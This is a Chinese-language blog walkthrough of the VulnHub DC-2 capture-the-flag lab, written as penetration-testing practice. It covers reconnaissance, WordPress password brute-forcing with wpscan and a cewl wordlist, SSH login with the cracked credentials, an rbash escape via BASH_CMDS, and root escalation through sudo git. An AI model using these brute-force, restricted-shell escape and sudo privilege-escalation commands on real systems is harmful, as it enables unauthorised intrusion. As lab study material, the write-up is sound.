目录
一、实验环境
1.1 攻击机Kali
(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式
(2)Kali的IP地址为192.168.101.130
1.2 靶机下载
(1)下载地址: DC: 2 ~ VulnHub
(2)通过上述简介可以知道,此盒子旨在为渗透测试领域积累经验,总共有五面旗帜,但最终目标是找到并读取root用户主目录中的那面旗帜。
(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式
(4)开启靶机
1.3 工具准备
- Wappalyzer插件
- wpscan
- cewl
二、站点信息收集
2.1 IP扫描
(1)使用命令netdiscover查找靶机的IP地址
(2)发现靶机地址为192.168.101.135
2.2 端口扫描
(1)使用nmap工具对目标机进行端口扫描,发现打开了80端口(http服务)和7744端口(ssh服务)
(2)访问http://192.168.101.135,页面无法访问,根据提示信息得知目标进行了重定向
(3)需要修改本地hosts文件,进行DNS解析
vim /etc/hosts
(4)重新访问http://192.168.101.135,访问成功
2.3 网页信息收集
(1)在网页找到了flag1,提示为使用cewl工具进行暴力破解
(2)使用火狐浏览器的Wappalyzer插件进行CMS识别,发现CMS是WordPress
2.4 目录扫描
使用dirsearch工具对网站目录进行扫描
dirsearch -u http://192.168.101.135
三、漏洞利用
3.1 暴力破解
(1)访问目录扫描出来的后台登录页面,根据提示尝试暴力破解
(2)由于该网站的CMS是wordpress,我们采用专门针对wordpress的工具wpscan来进行扫描用户,扫到了三个用户:admin、jerry和tom
WPScan 是一个专为 WordPress 网站设计的安全扫描工具,它能够识别出网站中使用的插件、主题和核心版本的已知漏洞,执行暴力破解尝试,检测不安全的配置以及文件权限问题,帮助网站管理员提高 WordPress 网站的安全性,防止潜在的攻击。
wpscan --url http://dc-2/ -e u
(3)使用cewl对目标网站生成密码字典
cewl 是一个用于抓取目标网站内容并生成自定义字典的工具。它会从指定的网页中提取单词,通常用于渗透测试中的字典攻击,比如暴力破解(Brute Force)等。
cewl http://dc-2 -w passwd.txt
(4)将扫描到的三个用户写入user.txt文件
(5)使用wpscan将user.txt与passwd.txt匹配爆破用户密码
wpscan --url http://dc-2/ -e -U /home/kali/user.txt -P /home/kali/passwd.txt
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
(6)使用jerry账号登录成功,并在page页面找到了flag2
(7)flag2提示如下,意思是如果你不能利用WordPress并走捷径,还有另一种方法
3.2 ssh连接
(1)使用jerry用户进行连接,连接失败
ssh jerry@192.168.101.135 -p 7744
(2)使用tom用户进行连接,连接成功
ssh tom@192.168.101.135 -p 7744
3.3 rbash绕过
(1)查看当前用户权限,发现被rbash限制了
rbash(restricted bash)是Bash的一种受限模式,通常用于限制用户的操作,防止他们进行潜在的危险行为,比如访问不该访问的文件或修改系统设置。
(2)查看当前shell环境中可用的所有命令
compgen -c
(3)查看当前环境变量
echo $PATH
(4)利用bash_cmds自定义一个shell,并添加两条环境变量
BASH_CMDS[a]=/bin/sh
a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
(5)找到了flag3.txt,提示切换用户
(6)切换到jerry用户,password就是上面爆破出来的密码,并在对应目录下找到了flag4.txt,提示我们可以使用git,即通过git来提权
四、权限提升
4.1 git提权
(1)查看一下可以使用的root权限命令
(2)查看当前用户可以通过sudo执行的命令列表
(3)使用git命令进行提取,直接在文件末尾输入!/bin/bash
sudo git help status
(4)回车后即为root用户,提权成功
4.2 查找flag
切换到root目录下,即可找到最后一个flag
声明
1.本博客文章均为博主日常学习原创内容,转载请注明出处。
2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。
3.希望以上的学习经验分享能对您有所帮助。
4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。